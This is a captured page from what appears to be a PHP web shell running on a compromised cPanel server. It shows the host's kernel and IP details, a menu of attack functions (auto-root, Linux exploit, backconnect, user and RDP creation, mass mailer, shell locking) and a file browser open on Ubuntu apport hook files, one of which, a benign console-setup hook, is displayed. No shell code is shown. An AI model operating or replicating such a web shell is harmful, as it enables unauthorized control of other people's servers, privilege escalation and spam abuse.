Linux cpanel.rrshost.in 5.15.0-25-generic #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022 x86_64
Apache
: 109.123.238.221 | : 172.69.214.199
128 Domain
8.2.28
aev999
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
apport /
package-hooks /
[ HOME SHELL ]
Name
Size
Permission
Action
bind9.py
738
B
-rw-r--r--
isc-dhcp-client.py
1.75
KB
-rw-r--r--
openssh-client.py
1.18
KB
-rw-r--r--
openssh-server.py
1004
B
-rw-r--r--
source_apparmor.py
2.72
KB
-rw-r--r--
source_console-setup.py
374
B
-rw-r--r--
source_fontconfig.py
162
B
-rw-r--r--
source_grub2.py
3.79
KB
-rw-r--r--
source_nfs-utils.py
1.17
KB
-rw-r--r--
source_plymouth.py
1.44
KB
-rw-r--r--
source_shadow.py
720
B
-rw-r--r--
source_sudo.py
1.13
KB
-rw-r--r--
source_ubuntu-release-upgrader...
2.62
KB
-rw-r--r--
source_update-manager.py
2.39
KB
-rw-r--r--
systemd.py
871
B
-rw-r--r--
udev.py
455
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : source_console-setup.py
'''apport package hook for console-setup Copyright (C) 2009 Canonical Ltd. Author: Colin Watson <cjwatson@ubuntu.com> ''' import apport.hookutils def add_info(report): apport.hookutils.attach_file_if_exists( report, '/etc/default/keyboard', 'Keyboard') apport.hookutils.attach_file_if_exists( report, '/etc/default/console-setup', 'ConsoleSetup')
Close